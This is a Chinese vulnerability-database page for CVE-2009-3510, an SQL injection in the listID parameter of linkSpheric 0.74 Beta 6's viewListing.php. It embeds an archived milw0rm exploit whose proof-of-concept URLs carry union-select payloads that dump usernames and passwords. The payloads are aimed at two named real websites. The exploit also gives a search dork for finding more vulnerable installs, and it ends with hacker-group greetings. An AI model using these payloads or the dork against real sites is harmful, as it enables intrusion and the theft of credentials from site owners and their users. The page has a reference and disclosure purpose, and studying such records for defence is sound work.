dataspheric linkspheric viewListing.php SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118210 漏洞类型 SQL注入
发布时间 2009-07-30 更新时间 2009-07-30
CVE编号 CVE-2009-3510 CNNVD-ID CNNVD-200910-101
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9316
https://www.securityfocus.com/bid/43304
https://cxsecurity.com/issue/WLB-2009100083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200910-101
|漏洞详情
linkSpheric0.74Beta6的viewListing.php中存在SQL注入漏洞。远程攻击者可以借助listID参数,执行任意的SQL指令。
|漏洞EXP
===============================================================================================


  [o] linkSpheric 0.74 Beta 6 SQL Inejction Vulnerability

       Software : linkSpheric version 0.74 Beta 6
       Vendor   : http://dataspheric.com/
       Download : http://sourceforge.net/projects/linkspheric/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===============================================================================================


  [o] Vulnerable file

        viewListing.php



  [o] Exploit

       http://localhost/[path]/viewListing.php?listID=[SQL]



  [o] Proof of concept

       http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
       http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--



  [o] Dork

       "Powered by linkSpheric"


===============================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.net ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

        
===============================================================================================

# milw0rm.com [2009-07-30]
|受影响的产品
dataSpheric linkSpheric 0.74 Beta 6
|参考资料

来源:MILW0RM
名称:9316
链接:http://www.milw0rm.com/exploits/9316